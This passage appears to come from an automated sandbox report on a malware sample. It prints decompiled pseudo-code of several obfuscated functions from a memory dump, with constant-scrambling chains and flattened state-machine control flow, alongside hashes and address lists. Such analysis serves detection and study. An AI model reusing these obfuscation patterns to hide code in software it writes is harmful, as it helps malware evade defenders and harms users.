                                          0x006d3566
                                          0x006d356e
                                          0x006d356e
                                          0x006d3578
                                          0x006d3600
                                          0x006d3602
                                          0x006d357a
                                          0x006d3580
                                          0x006d35a2
                                          0x006d35a7
                                          0x006d35aa
                                          0x00000000
                                          0x006d3582
                                          0x006d3588
                                          0x00000000
                                          0x006d358a
                                          0x006d358a
                                          0x00000000
                                          0x006d358a
                                          0x006d3588
                                          0x006d3580
                                          0x006d3606
                                          0x006d360e
                                          0x006d360e
                                          0x006d35c6
                                          0x006d35cb
                                          0x006d35ce
                                          0x006d35d0
                                          0x006d35d6
                                          0x00000000
                                          0x006d35d2
                                          0x006d35d2
                                          0x00000000
                                          0x006d35d2
                                          0x00000000
                                          0x006d35db
                                          0x006d35db
                                          0x006d35db
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: @d
                                          • API String ID: 0-4219467963
                                          • Opcode ID: 84c63284fc0912dd3544375fe592f81bfaac633f79c2e287a3bc015bf26ad4b2
                                          • Instruction ID: b7a1d3383e4ef84cb93354ebcea1bd91a63089b4ee2b038303f2890c5c72a6e4
                                          • Opcode Fuzzy Hash: 84c63284fc0912dd3544375fe592f81bfaac633f79c2e287a3bc015bf26ad4b2
                                          • Instruction Fuzzy Hash: 205177B15083429BD318CF21D94A91FFBE2FBD4748F504A1EF596A2260D775CA0A8B87
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D3FE7, Relevance: 1.4, Strings: 1, Instructions: 115COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E006D3FE7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				void* _t80;
				signed int _t94;
				signed int _t95;
				void* _t98;
				void* _t114;
				void* _t115;
				void* _t117;
				void* _t118;

				_push(_a8);
				_t114 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006C602B(_t80);
				_v96 = 0xd1bf;
				_t118 = _t117 + 0x10;
				_t115 = 0;
				_t98 = 0x349149b3;
				_t94 = 0x64;
				_v96 = _v96 / _t94;
				_v96 = _v96 ^ 0x00007874;
				_v104 = 0x2a01;
				_v104 = _v104 + 0x4d1a;
				_v104 = _v104 + 0xb0bd;
				_v104 = _v104 ^ 0x00017b91;
				_v108 = 0x44db;
				_v108 = _v108 + 0xffff0b38;
				_t95 = 0x1c;
				_v108 = _v108 * 7;
				_v108 = _v108 ^ 0xfffb0952;
				_v112 = 0x5707;
				_v112 = _v112 + 0x69dd;
				_v112 = _v112 + 0xef17;
				_v112 = _v112 | 0x7086095e;
				_v112 = _v112 ^ 0x7087ed58;
				_v92 = 0x8129;
				_v92 = _v92 >> 3;
				_v92 = _v92 ^ 0x00001eae;
				_v80 = 0x8f03;
				_v80 = _v80 ^ 0x5fd75a11;
				_v80 = _v80 ^ 0x5fd7f025;
				_v84 = 0x94fc;
				_v84 = _v84 >> 0x10;
				_v84 = _v84 ^ 0x00001c7c;
				_v100 = 0xd584;
				_v100 = _v100 >> 0xe;
				_v100 = _v100 / _t95;
				_v100 = _v100 ^ 0x00001ad3;
				_v88 = 0x35b5;
				_v88 = _v88 * 0x43;
				_v88 = _v88 ^ 0x000e607f;
				do {
					while(_t98 != 0x2d9dd110) {
						if(_t98 == 0x2e4dc862) {
							__eflags = E006D8F11( &_v76, _v80, _v84, _t114 + 8, _v100, _v88);
							_t115 =  !=  ? 1 : _t115;
						} else {
							if(_t98 == 0x32f61d6a) {
								E006D50F2( &_v76, _v96, _v104, _v108, _a8);
								_t118 = _t118 + 0xc;
								_t98 = 0x2d9dd110;
								continue;
							} else {
								if(_t98 != 0x349149b3) {
									goto L10;
								} else {
									_t98 = 0x32f61d6a;
									continue;
								}
							}
						}
						L13:
						return _t115;
					}
					__eflags = E006CB055(_v112, _v92, __eflags,  &_v76, _t114);
					if(__eflags == 0) {
						_t98 = 0x5080212;
						goto L10;
					} else {
						_t98 = 0x2e4dc862;
						continue;
					}
					goto L13;
					L10:
					__eflags = _t98 - 0x5080212;
				} while (__eflags != 0);
				goto L13;
			}





















                                          0x006d3fee
                                          0x006d3ff5
                                          0x006d3ff7
                                          0x006d3ffe
                                          0x006d3fff
                                          0x006d4000
                                          0x006d4005
                                          0x006d400d
                                          0x006d4016
                                          0x006d4018
                                          0x006d4024
                                          0x006d4029
                                          0x006d402f
                                          0x006d4037
                                          0x006d403f
                                          0x006d4047
                                          0x006d404f
                                          0x006d4057
                                          0x006d405f
                                          0x006d406c
                                          0x006d406d
                                          0x006d4071
                                          0x006d4079
                                          0x006d4081
                                          0x006d4089
                                          0x006d4091
                                          0x006d4099
                                          0x006d40a1
                                          0x006d40a9
                                          0x006d40ae
                                          0x006d40b6
                                          0x006d40be
                                          0x006d40c6
                                          0x006d40ce
                                          0x006d40d6
                                          0x006d40db
                                          0x006d40e3
                                          0x006d40eb
                                          0x006d40fb
                                          0x006d40ff
                                          0x006d4107
                                          0x006d4114
                                          0x006d4118
                                          0x006d4120
                                          0x006d4120
                                          0x006d412a
                                          0x006d41b1
                                          0x006d41b3
                                          0x006d412c
                                          0x006d412e
                                          0x006d4153
                                          0x006d4158
                                          0x006d415b
                                          0x00000000
                                          0x006d4130
                                          0x006d4136
                                          0x00000000
                                          0x006d4138
                                          0x006d4138
                                          0x00000000
                                          0x006d4138
                                          0x006d4136
                                          0x006d412e
                                          0x006d41b7
                                          0x006d41bf
                                          0x006d41bf
                                          0x006d4177
                                          0x006d4179
                                          0x006d417f
                                          0x00000000
                                          0x006d417b
                                          0x006d417b
                                          0x00000000
                                          0x006d417b
                                          0x00000000
                                          0x006d4184
                                          0x006d4184
                                          0x006d4184
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: tx
                                          • API String ID: 0-1414813443
                                          • Opcode ID: 7a271fa6b78f15920441f448b7bb9f475cb0270aa55ebeddac197ee12bed0436
                                          • Instruction ID: a7bd4ae37e523961470bf75b646709387a5dda70caab57a88df6f36ae4a913ca
                                          • Opcode Fuzzy Hash: 7a271fa6b78f15920441f448b7bb9f475cb0270aa55ebeddac197ee12bed0436
                                          • Instruction Fuzzy Hash: F4419E719083429FE758CE21C88592FBBE2FBD8718F104A1EF5C596260DB75DA09CB47
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006C60B9, Relevance: 1.4, Strings: 1, Instructions: 104COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 84%
                                          			E006C60B9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				char _v44;
				void* _t104;
				void* _t109;
				signed int _t124;
				signed int _t125;
				signed int _t126;
				void* _t128;

				_push(_a20);
				_t109 = __ecx;
				_t111 = _a16;
				_push(_a16);
				_push(_a12);
				_v44 = 0x104;
				_push(0x104);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006C602B(0x104);
				_v8 = 0xaf29;
				_v8 = _v8 >> 0xe;
				_t128 = 0;
				_v8 = _v8 >> 4;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x0000662d;
				_v20 = 0xac55;
				_v20 = _v20 | 0x2323cee5;
				_t124 = 0x4c;
				_v20 = _v20 / _t124;
				_v20 = _v20 ^ 0x007629b6;
				_v16 = 0xabf2;
				_v16 = _v16 | 0x220f7c85;
				_v16 = _v16 + 0xffff7509;
				_v16 = _v16 ^ 0x220f51b4;
				_v40 = 0x3232;
				_t125 = 0x1f;
				_v40 = _v40 / _t125;
				_v40 = _v40 ^ 0x00004228;
				_v36 = 0x2ec1;
				_v36 = _v36 | 0xae4e7a63;
				_v36 = _v36 ^ 0xae4e526e;
				_v12 = 0xa12f;
				_v12 = _v12 << 0xe;
				_v12 = _v12 << 0xb;
				_v12 = _v12 << 0x10;
				_v12 = _v12 ^ 0x00007580;
				_v32 = 0xadd8;
				_v32 = _v32 | 0x6e6f3325;
				_v32 = _v32 ^ 0x5adaef9e;
				_v32 = _v32 ^ 0x34b54fa4;
				_v28 = 0xb293;
				_t126 = 0x3b;
				_v28 = _v28 * 0x2d;
				_v28 = _v28 << 0xb;
				_v28 = _v28 ^ 0xfb1ed4cf;
				_v24 = 0x2b1c;
				_v24 = _v24 * 6;
				_v24 = _v24 / _t126;
				_v24 = _v24 ^ 0x00001462;
				_t104 = E006C7551(_a16, _v24);
				_t127 = _t104;
				if(_t104 != 0) {
					_t128 = E006C7663(_v40, _v36, _t127, _t109,  &_v44, _t111, _v12);
					E006D4F7D(_v32, _v28, _t127);
				}
				return _t128;
			}



















                                          0x006c60c2
                                          0x006c60c5
                                          0x006c60cc
                                          0x006c60cf
                                          0x006c60d0
                                          0x006c60d3
                                          0x006c60d6
                                          0x006c60d7
                                          0x006c60da
                                          0x006c60db
                                          0x006c60dc
                                          0x006c60e1
                                          0x006c60ea
                                          0x006c60ee
                                          0x006c60f0
                                          0x006c60f4
                                          0x006c60f8
                                          0x006c60ff
                                          0x006c6106
                                          0x006c6112
                                          0x006c6117
                                          0x006c611c
                                          0x006c6123
                                          0x006c612a
                                          0x006c6131
                                          0x006c6138
                                          0x006c613f
                                          0x006c6149
                                          0x006c614e
                                          0x006c6153
                                          0x006c615a
                                          0x006c6161
                                          0x006c6168
                                          0x006c616f
                                          0x006c6176
                                          0x006c617a
                                          0x006c617e
                                          0x006c6182
                                          0x006c6189
                                          0x006c6190
                                          0x006c6197
                                          0x006c619e
                                          0x006c61a5
                                          0x006c61b0
                                          0x006c61b4
                                          0x006c61b7
                                          0x006c61bb
                                          0x006c61c2
                                          0x006c61cd
                                          0x006c61d5
                                          0x006c61d8
                                          0x006c61eb
                                          0x006c61f0
                                          0x006c61f7
                                          0x006c6211
                                          0x006c6217
                                          0x006c621c
                                          0x006c6227

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: %3on
                                          • API String ID: 2962429428-3639271662
                                          • Opcode ID: bcb4d8aa597083075a1a4f3e635b6eeb780b205d042a878a759378dadee66bdf
                                          • Instruction ID: d82897575f7c6fcae53ecdb04c91c1ea537830d6b8390fb15c34ed743e2c763d
                                          • Opcode Fuzzy Hash: bcb4d8aa597083075a1a4f3e635b6eeb780b205d042a878a759378dadee66bdf
                                          • Instruction Fuzzy Hash: B5413871E0020AABDB04DFE5C98A8EEFBB5FB44704F208159E511B7250D7B89B55CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006CF536, Relevance: 1.3, Strings: 1, Instructions: 66COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E006CF536(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				void* _t73;
				signed int _t84;

				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006C602B(_t73);
				_v28 = _v28 & 0x00000000;
				_v32 = 0x4854b3;
				_v8 = 0xdc0b;
				_t84 = 0x56;
				_v8 = _v8 * 0xf;
				_v8 = _v8 >> 3;
				_v8 = _v8 ^ 0x0001e73e;
				_v12 = 0xfbc9;
				_v12 = _v12 + 0xb4de;
				_v12 = _v12 * 0x28;
				_v12 = _v12 ^ 0x0043d2f8;
				_v12 = 0x51f2;
				_v12 = _v12 + 0xffffcc79;
				_v12 = _v12 + 0xffffba87;
				_v12 = _v12 ^ 0xffffb404;
				_v12 = 0x6c9d;
				_v12 = _v12 / _t84;
				_v12 = _v12 >> 1;
				_v12 = _v12 ^ 0x0000581b;
				_v12 = 0x414e;
				_v12 = _v12 >> 0xd;
				_v12 = _v12 | 0x4fdc2cbe;
				_v12 = _v12 ^ 0x4fdc7af3;
				_v12 = 0xe540;
				_v12 = _v12 * 0x6f;
				_v12 = _v12 ^ 0x1b88e412;
				_v12 = _v12 ^ 0x1bebfc09;
				_v24 = 0x3d7;
				_v24 = _v24 + 0xffffb00b;
				_v24 = _v24 ^ 0xffff901a;
				_v20 = 0xd6b0;
				_v20 = _v20 ^ 0xee2b6cd1;
				_v20 = _v20 ^ 0xee2bf683;
				_v16 = 0x5822;
				_v16 = _v16 + 0xa5f;
				_v16 = _v16 ^ 0x00006b11;
				return E006D08F3(_v12, _v24, _v20, _a8, _t84, E006CC506(_t84), _v16);
			}












                                          0x006cf53c
                                          0x006cf53f
                                          0x006cf542
                                          0x006cf543
                                          0x006cf544
                                          0x006cf549
                                          0x006cf550
                                          0x006cf559
                                          0x006cf566
                                          0x006cf567
                                          0x006cf56a
                                          0x006cf56e
                                          0x006cf575
                                          0x006cf57c
                                          0x006cf587
                                          0x006cf58a
                                          0x006cf591
                                          0x006cf598
                                          0x006cf59f
                                          0x006cf5a6
                                          0x006cf5ad
                                          0x006cf5b9
                                          0x006cf5bc
                                          0x006cf5bf
                                          0x006cf5c6
                                          0x006cf5cd
                                          0x006cf5d1
                                          0x006cf5d8
                                          0x006cf5df
                                          0x006cf5ea
                                          0x006cf5ed
                                          0x006cf5f4
                                          0x006cf5fb
                                          0x006cf602
                                          0x006cf609
                                          0x006cf610
                                          0x006cf617
                                          0x006cf61e
                                          0x006cf625
                                          0x006cf62c
                                          0x006cf633
                                          0x006cf65e

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: j^
                                          • API String ID: 0-2773993462
                                          • Opcode ID: d6eabca0427ab4eaaf53c26815c4da8668a2aa53d83320917823e6483645e30f
                                          • Instruction ID: 58e547acad6fd8759a1f4e2f7b5bee5414499525bfb023e861c9a33e7f6146df
                                          • Opcode Fuzzy Hash: d6eabca0427ab4eaaf53c26815c4da8668a2aa53d83320917823e6483645e30f
                                          • Instruction Fuzzy Hash: E231E0B4C0070AEBDF48DFA4C98A59EBFB5FB00304F608089D515B62A0D3B94B959F84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D5D1D, Relevance: .2, Instructions: 183COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E006D5D1D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr* _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				unsigned int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				void* _t165;
				intOrPtr* _t183;
				void* _t185;
				void* _t194;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t198;
				void* _t199;

				_t183 = _a24;
				_push(_t183);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E006C602B(_t165);
				_v96 = 0x1c20a7;
				_t194 = 0;
				_v84 = _v84 & 0;
				_t199 = _t198 + 0x20;
				_v92 = 0x7c153;
				_v88 = 0xb2086;
				_t185 = 0x2476afb9;
				_v8 = 0x4175;
				_v8 = _v8 + 0xffff57ff;
				_v8 = _v8 | 0xfffbf4ff;
				_v8 = _v8 ^ 0xffffd856;
				_v56 = 0x400d;
				_v56 = _v56 << 0xa;
				_v56 = _v56 ^ 0x01004a82;
				_v52 = 0xfa4b;
				_t195 = 0x3f;
				_v52 = _v52 * 0xf;
				_v52 = _v52 ^ 0x000ed31b;
				_v48 = 0x532b;
				_v48 = _v48 | 0xa8aca4f9;
				_v48 = _v48 ^ 0xa8acfbbc;
				_v44 = 0x6cab;
				_v44 = _v44 * 0xd;
				_v44 = _v44 ^ 0x0005813c;
				_v32 = 0xa076;
				_v32 = _v32 + 0x7ba7;
				_v32 = _v32 * 0x33;
				_v32 = _v32 ^ 0x0038af53;
				_v28 = 0x80ef;
				_v28 = _v28 << 0xb;
				_v28 = _v28 | 0xbfaa7514;
				_v28 = _v28 ^ 0xbfaf1f10;
				_v24 = 0x2421;
				_v24 = _v24 / _t195;
				_t196 = 3;
				_v24 = _v24 / _t196;
				_v24 = _v24 ^ 0x000050e2;
				_v68 = 0xf6e5;
				_v68 = _v68 >> 8;
				_v68 = _v68 ^ 0x0000085c;
				_v64 = 0x7950;
				_v64 = _v64 | 0xc26498fa;
				_v64 = _v64 ^ 0xc264e84e;
				_v60 = 0xb7cc;
				_v60 = _v60 + 0xffffacef;
				_v60 = _v60 ^ 0x0000478a;
				_v40 = 0x6379;
				_v40 = _v40 >> 0xa;
				_v40 = _v40 << 5;
				_v40 = _v40 ^ 0x00006e22;
				_v20 = 0xe665;
				_v20 = _v20 << 9;
				_v20 = _v20 ^ 0xe4ef8652;
				_v20 = _v20 + 0xffffeafe;
				_v20 = _v20 ^ 0xe52339cd;
				_v80 = 0x4d1e;
				_v80 = _v80 + 0xffffc710;
				_v80 = _v80 ^ 0x000046ed;
				_v16 = 0x18c;
				_v16 = _v16 >> 4;
				_t197 = _v80;
				_v16 = _v16 * 0x41;
				_v16 = _v16 ^ 0x73128289;
				_v16 = _v16 ^ 0x7312c7aa;
				_v12 = 0xdd0b;
				_v12 = _v12 + 0xffff65de;
				_v12 = _v12 * 0x3b;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0x0f6bc641;
				_v76 = 0xf5b7;
				_v76 = _v76 ^ 0xdca6f1c9;
				_v76 = _v76 ^ 0xdca64fd3;
				_v36 = 0xdf9f;
				_v36 = _v36 + 0x7ffe;
				_v36 = _v36 + 0x4fda;
				_v36 = _v36 ^ 0x00019ee0;
				_v72 = 0x5c39;
				_v72 = _v72 ^ 0x85106c7e;
				_v72 = _v72 ^ 0x85105bd4;
				do {
					while(_t185 != 0x6efb3d4) {
						if(_t185 == 0xfd0cdc7) {
							_t197 = E006D96CB(_t185, _v8, _v56, _v52, _a20, _v48, 0, _v44, _v32, _a12, _t185, _a16, 0, _v28, _v24);
							_t199 = _t199 + 0x38;
							if(_t197 == 0) {
								L15:
								return _t194;
							}
							_t185 = 0x6efb3d4;
							continue;
						}
						if(_t185 == 0x1eddc4e8) {
							E006D96CB(_t185, _v40, _v20, _v80, _a20, _v16, _t197, _v12, _v76, _a12, _t185, _a16, _t194, _v36, _v72);
							if(_t183 != 0) {
								 *_t183 = _t197;
							}
							goto L15;
						}
						if(_t185 != 0x2476afb9) {
							goto L11;
						}
						_t185 = 0xfd0cdc7;
					}
					_push(_t185);
					_push(_t185);
					_t194 = E006C8736(_t197);
					if(_t194 == 0) {
						_t185 = 0x710c028;
						goto L11;
					}
					_t185 = 0x1eddc4e8;
					continue;
					L11:
				} while (_t185 != 0x710c028);
				goto L15;
			}



































                                          0x006d5d24
                                          0x006d5d29
                                          0x006d5d2a
                                          0x006d5d2d
                                          0x006d5d30
                                          0x006d5d33
                                          0x006d5d36
                                          0x006d5d3a
                                          0x006d5d3b
                                          0x006d5d40
                                          0x006d5d47
                                          0x006d5d49
                                          0x006d5d4c
                                          0x006d5d4f
                                          0x006d5d58
                                          0x006d5d5f
                                          0x006d5d64
                                          0x006d5d6b
                                          0x006d5d72
                                          0x006d5d79
                                          0x006d5d80
                                          0x006d5d87
                                          0x006d5d8b
                                          0x006d5d92
                                          0x006d5d9f
                                          0x006d5da2
                                          0x006d5da5
                                          0x006d5dac
                                          0x006d5db3
                                          0x006d5dba
                                          0x006d5dc1
                                          0x006d5dcc
                                          0x006d5dcf
                                          0x006d5dd6
                                          0x006d5ddd
                                          0x006d5de8
                                          0x006d5deb
                                          0x006d5df2
                                          0x006d5df9
                                          0x006d5dfd
                                          0x006d5e04
                                          0x006d5e0b
                                          0x006d5e19
                                          0x006d5e1f
                                          0x006d5e22
                                          0x006d5e25
                                          0x006d5e2c
                                          0x006d5e33
                                          0x006d5e37
                                          0x006d5e3e
                                          0x006d5e45
                                          0x006d5e4c
                                          0x006d5e53
                                          0x006d5e5a
                                          0x006d5e61
                                          0x006d5e68
                                          0x006d5e6f
                                          0x006d5e73
                                          0x006d5e77
                                          0x006d5e7e
                                          0x006d5e85
                                          0x006d5e89
                                          0x006d5e90
                                          0x006d5e97
                                          0x006d5e9e
                                          0x006d5ea5
                                          0x006d5eac
                                          0x006d5eb3
                                          0x006d5eba
                                          0x006d5ec2
                                          0x006d5ec5
                                          0x006d5ec8
                                          0x006d5ecf
                                          0x006d5ed6
                                          0x006d5edd
                                          0x006d5ee8
                                          0x006d5eeb
                                          0x006d5eef
                                          0x006d5ef6
                                          0x006d5efd
                                          0x006d5f04
                                          0x006d5f0b
                                          0x006d5f12
                                          0x006d5f19
                                          0x006d5f20
                                          0x006d5f27
                                          0x006d5f2e
                                          0x006d5f35
                                          0x006d5f3c
                                          0x006d5f3c
                                          0x006d5f4a
                                          0x006d5f92
                                          0x006d5f94
                                          0x006d5f99
                                          0x006d600b
                                          0x006d6013
                                          0x006d6013
                                          0x006d5f9b
                                          0x00000000
                                          0x006d5f9b
                                          0x006d5f52
                                          0x006d5ffd
                                          0x006d6007
                                          0x006d6009
                                          0x006d6009
                                          0x00000000
                                          0x006d6007
                                          0x006d5f5e
                                          0x00000000
                                          0x00000000
                                          0x006d5f60
                                          0x006d5f60
                                          0x006d5fab
                                          0x006d5fac
                                          0x006d5fb4
                                          0x006d5fba
                                          0x006d5fc6
                                          0x00000000
                                          0x006d5fc6
                                          0x006d5fbc
                                          0x00000000
                                          0x006d5fcb
                                          0x006d5fcb
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000007.00000002.2095095758.00000000006C1000.00000020.00000001.sdmp, Offset: 006C0000, based on PE: true
                                          • Associated: 00000007.00000002.2095092922.00000000006C0000.00000004.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.2095106870.00000000006DC000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5e6e57c7a1614f6cb1ce50e5bb62308fc3ef47fd83243680ecf1339f7ec9648b
                                          • Instruction ID: 5a1fe3d6369a9c4562b22f2a67a2511f4744ca97b333c4f1e867d052efeeb01a
                                          • Opcode Fuzzy Hash: 5e6e57c7a1614f6cb1ce50e5bb62308fc3ef47fd83243680ecf1339f7ec9648b
                                          • Instruction Fuzzy Hash: A8912672C0060AABDF15CFE5D9895EEBFB2FF04314F208109E61276260D7B94A55CF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 006D0F0C, Relevance: .2, Instructions: 163COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E006D0F0C(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				void* _t132;
				signed int _t149;
				void* _t152;
				void* _t154;
				signed int _t173;
				signed int _t174;
				signed int _t175;
				signed int _t176;
				signed int _t177;
				void* _t179;
				void* _t180;
				void* _t181;

				_push(_a20);
				_t152 = __edx;
				_push(0xffffffff);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				E006C602B(_t132);
				_v44 = 0x160;
				_t181 = _t180 + 0x1c;
				_v44 = _v44 ^ 0x1b432315;
				_v44 = _v44 ^ 0x1b433d06;
				_t179 = 0;
				_v12 = 0x3352;
				_t154 = 0x2476afb9;
				_v12 = _v12 + 0xffffca9f;
				_v12 = _v12 << 1;
				_t173 = 0x29;
				_v12 = _v12 / _t173;
				_v12 = _v12 ^ 0x063e5c60;
				_v8 = 0x701a;
				_t174 = 0x52;
				_v8 = _v8 / _t174;
				_t175 = 0x4e;
				_v8 = _v8 / _t175;
				_t176 = 0x41;
				_v8 = _v8 / _t176;
				_v8 = _v8 ^ 0x0000431a;
				_v40 = 0xf48c;
				_v40 = _v40 + 0xffff0dc2;
				_v40 = _v40 ^ 0x0000090f;
				_v36 = 0x5475;
				_v36 = _v36 << 0xf;
				_v36 = _v36 ^ 0x2a3aa88b;
				_v16 = 0xfc71;
				_v16 = _v16 ^ 0x0a975394;
				_v16 = _v16 | 0x3f9daa18;
				_v16 = _v16 + 0xffff523a;
				_v16 = _v16 ^ 0x3f9f63b5;
				_v48 = 0xbfc9;
				_t177 = 0x63;
				_v48 = _v48 / _t177;
				_v48 = _v48 ^ 0x0000151a;
				_v32 = 0xfc2a;
				_v32 = _v32 | 0x12ce1451;
				_v32 = _v32 + 0x3ff4;
				_v32 = _v32 ^ 0x12cf51f6;
				_v56 = 0x5ac8;
				_v56 = _v56 | 0xf85dcbd1;
				_v56 = _v56 ^ 0xf85dd81d;
				_v52 = 0x6e3;
				_v52 = _v52 << 8;
				_v52 = _v52 ^ 0x0006be09;
				_v28 = 0x1612;
				_v28 = _v28 ^ 0x471c56e0;
				_v28 = _v28 >> 1;
				_v28 = _v28 + 0xffff1cc1;
				_v28 = _v28 ^ 0x238d2d3e;
				_v24 = 0x515e;
				_v24 = _v24 + 0x963f;
				_v24 = _v24 + 0xffff7349;
				_t178 = _v56;
				_v24 = _v24 * 0x11;
				_v24 = _v24 ^ 0x000650d8;
				_v20 = 0x1a04;
				_v20 = _v20 | 0x2258a5ab;
				_v20 = _v20 + 0xffff2fa3;
				_v20 = _v20 + 0x9894;
				_v20 = _v20 ^ 0x2258a793;
				do {
					while(_t154 != 0x6efb3d4) {
						if(_t154 == 0xfd0cdc7) {
							_t149 = E006D7AFD(_v44, _v12, _t154, _v8, 0, _t152, 0, 0xffffffff, _v40, _v36, _a12);
							_t178 = _t149;
							_t181 = _t181 + 0x24;
							if(_t149 != 0) {
								_t154 = 0x6efb3d4;
								continue;
							}
						} else {
							if(_t154 == 0x1eddc4e8) {
								E006D7AFD(_v56, _v52, _t154, _v28, _t179, _t152, _t178, 0xffffffff, _v24, _v20, _a12);
							} else {
								if(_t154 != 0x2476afb9) {
									goto L11;
								} else {
									_t154 = 0xfd0cdc7;
									continue;
								}
							}
						}
						L14:
						return _t179;
					}
					_push(_t154);
					_push(_t154);
					_t179 = E006C8736(_t178 + _t178);
					if(_t179 == 0) {
						_t154 = 0x710c028;
						goto L11;
					} else {
						_t154 = 0x1eddc4e8;
						continue;
					}
					goto L14;
					L11:
				} while (_t154 != 0x710c028);
				goto L14;
			}




























                                          0x006d0f15
                                          0x006d0f18
                                          0x006d0f1a
                                          0x006d0f1c
                                          0x006d0f1f
                                          0x006d0f22
                                          0x006d0f24
                                          0x006d0f25
                                          0x006d0f26
                                          0x006d0f2b
                                          0x006d0f32
                                          0x006d0f35
                                          0x006d0f3e
                                          0x006d0f45
                                          0x006d0f47
                                          0x006d0f4e
                                          0x006d0f53
                                          0x006d0f5a
                                          0x006d0f62
                                          0x006d0f67
                                          0x006d0f6c
                                          0x006d0f73
                                          0x006d0f7d
                                          0x006d0f82
                                          0x006d0f8a
                                          0x006d0f8f
                                          0x006d0f97
                                          0x006d0f9c
                                          0x006d0fa1
                                          0x006d0fa8
                                          0x006d0faf
                                          0x006d0fb6
                                          0x006d0fbd
                                          0x006d0fc4
                                          0x006d0fc8
                                          0x006d0fcf
                                          0x006d0fd6
                                          0x006d0fdd
                                          0x006d0fe4
                                          0x006d0feb
                                          0x006d0ff2
                                          0x006d0ffc
                                          0x006d0fff
                                          0x006d1002
                                          0x006d1009
                                          0x006d1010
                                          0x006d1017
                                          0x006d101e
                                          0x006d1025
                                          0x006d102c
                                          0x006d1033
                                          0x006d103a
                                          0x006d1041
                                          0x006d1045
                                          0x006d104c
                                          0x006d1053
                                          0x006d105a
                                          0x006d105d
                                          0x006d1064
                                          0x006d106b
                                          0x006d1072
                                          0x006d1079
                                          0x006d1084
                                          0x006d1087
                                          0x006d108a
                                          0x006d1091
                                          0x006d1098
                                          0x006d109f
                                          0x006d10a6
                                          0x006d10ad
                                          0x006d10b4
                                          0x006d10b4
                                          0x006d10c2
                                          0x006d10f5
